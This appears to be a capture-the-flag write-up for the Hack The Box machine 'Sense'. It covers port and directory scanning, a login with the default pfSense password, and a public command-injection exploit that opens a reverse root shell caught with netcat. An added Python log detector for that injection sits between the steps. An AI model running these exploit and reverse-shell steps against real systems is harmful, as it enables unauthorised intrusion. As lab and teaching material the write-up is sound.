HTB Sense

$ nmap -A -T4 -p- sense.htb

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 11:03 CEST
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.75% done; ETC: 11:06 (0:00:03 remaining)
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.051s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 187.56 seconds

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/23 10:59:21 Starting gobuster
===============================================================
Error: error on running goubster: unable to connect to https://10.10.10.60/: invalid certificate: x509: cannot validate certificate for 10.10.10.60 because it doesn't contain any IP SANs

The certificate has no IP SAN, so we need to skip SSL certificate verification with the -k option.

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/23 11:00:25 Starting gobuster
===============================================================
https://10.10.10.60/themes (Status: 301)
https://10.10.10.60/css (Status: 301)
https://10.10.10.60/includes (Status: 301)
https://10.10.10.60/javascript (Status: 301)
https://10.10.10.60/classes (Status: 301)
https://10.10.10.60/widgets (Status: 301)
https://10.10.10.60/tree (Status: 301)
https://10.10.10.60/shortcuts (Status: 301)
https://10.10.10.60/installer (Status: 301)
https://10.10.10.60/wizards (Status: 301)
https://10.10.10.60/csrf (Status: 301)
===============================================================
2020/08/23 11:07:44 Finished
===============================================================

$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -x .txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/23 11:37:44 Starting gobuster
===============================================================
https://10.10.10.60/themes (Status: 301)
https://10.10.10.60/css (Status: 301)
https://10.10.10.60/includes (Status: 301)
https://10.10.10.60/javascript (Status: 301)
https://10.10.10.60/changelog.txt (Status: 200)
https://10.10.10.60/classes (Status: 301)
https://10.10.10.60/widgets (Status: 301)
https://10.10.10.60/tree (Status: 301)
https://10.10.10.60/shortcuts (Status: 301)
https://10.10.10.60/installer (Status: 301)
https://10.10.10.60/wizards (Status: 301)
[ERROR] 2020/08/23 11:52:38 [!] Get https://10.10.10.60/newspage-81: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:53:40 [!] Get https://10.10.10.60/website_hosting.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:55:12 [!] Get https://10.10.10.60/76452: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:55:14 [!] Get https://10.10.10.60/20030507.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 11:56:50 [!] Get https://10.10.10.60/p29: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
https://10.10.10.60/csrf (Status: 301)
https://10.10.10.60/system-users.txt (Status: 200)
https://10.10.10.60/filebrowser (Status: 301)
[ERROR] 2020/08/23 12:14:58 [!] Get https://10.10.10.60/79138.txt: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/23 12:17:41 [!] Get https://10.10.10.60/dwg: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
https://10.10.10.60/%7Echeckout%7E (Status: 403)
===============================================================
2020/08/23 12:29:50 Finished
===============================================================

We've found two text files, changelog.txt and system-users.txt.

changelog.txt

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

system-users.txt

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

Company defaults?
As this is a pfSense site, we can try the default pfSense password (pfsense).

Browsing to http://10.10.10.60

This is a pfSense login page.

user: rohit
password: pfsense

Version is 2.1.3-RELEASE (amd64)

pfSense < 2.1.4 is vulnerable to a command injection.

pfSense < 2.1.4 – ‘status_rrd_graph_img.php’ Command Injection
https://www.exploit-db.com/exploits/43560
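From the defender's side, the useful artefact here is the web server log: a command injection through status_rrd_graph_img.php has to pass shell metacharacters in the query string, which legitimate graph requests never carry. The following detector is an added example, not the author's exploit and not pfSense code; the log lines are constructed in common log format, and the parameter name `param` and the values are placeholders rather than the real vulnerable parameter.

```python
"""Flag requests to status_rrd_graph_img.php whose query string carries
shell metacharacters (the command-injection pattern the writeup abuses).

Added example, not part of the original writeup or of pfSense.
Log lines are constructed; parameter names/values are placeholders.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common log format as written by lighttpd/Apache:
# client ident user [timestamp] "METHOD target PROTO" status bytes
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Characters that never belong in a legitimate RRD graph request.
SHELL_META = re.compile(r'[;|`&\n\r]|\$\(')

SENSITIVE_PATH = "/status_rrd_graph_img.php"


def is_suspicious_request(target: str) -> bool:
    """True if target hits the RRD graph script with shell metacharacters
    in any query value (after decoding, including double encoding)."""
    parts = urlsplit(target)
    if parts.path != SENSITIVE_PATH:
        return False
    # parse_qsl already decodes one layer of percent-encoding;
    # unquote() again catches double-encoded payloads.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if SHELL_META.search(unquote(value)):
            return True
    return False


def scan_log(lines):
    """Return (ip, timestamp, target) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        if is_suspicious_request(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), m.group("target")))
    return hits


# Constructed sample log (placeholder parameter and values, not captured traffic).
SAMPLE_LOG = [
    '10.10.14.6 - - [22/Aug/2020:11:10:01 +0200] "GET /index.php HTTP/1.1" 200 1234',
    '10.10.14.6 - - [22/Aug/2020:11:10:05 +0200] "GET /status_rrd_graph_img.php?param=traffic HTTP/1.1" 200 4321',
    '10.10.14.6 - - [22/Aug/2020:11:11:30 +0200] "GET /status_rrd_graph_img.php?param=traffic%3Bfoo HTTP/1.1" 200 4321',
    '10.10.14.6 - - [22/Aug/2020:11:12:00 +0200] "GET /status_rrd_graph_img.php?param=traffic%2524%2528foo%2529 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious request: {target}")
```

The benign graph request (second line) passes, while the single-encoded `;` and the double-encoded `$(` are both flagged; the second decoding step matters because a single `parse_qsl` pass would leave `%24%28` untouched and miss the fourth line.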

$ python3 sense_exploit.py --rhost 10.10.10.60 --lhost 10.10.14.6 --lport 1234 --username rohit --password pfsense

CSRF token obtained
Running exploit...
Exploit completed

$ nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.60] 4534
sh: can't access tty; job control turned off
#

# whoami

root

# cd /home
# ls

.snap
rohit

# cd rohit
# ls

.tcshrc
user.txt

# cat user.txt

8721XXXXXXXXXXXXXXXXXXXXXXXXXXXX

# cd /root
# cat root.txt

d08cXXXXXXXXXXXXXXXXXXXXXXXXXXXX
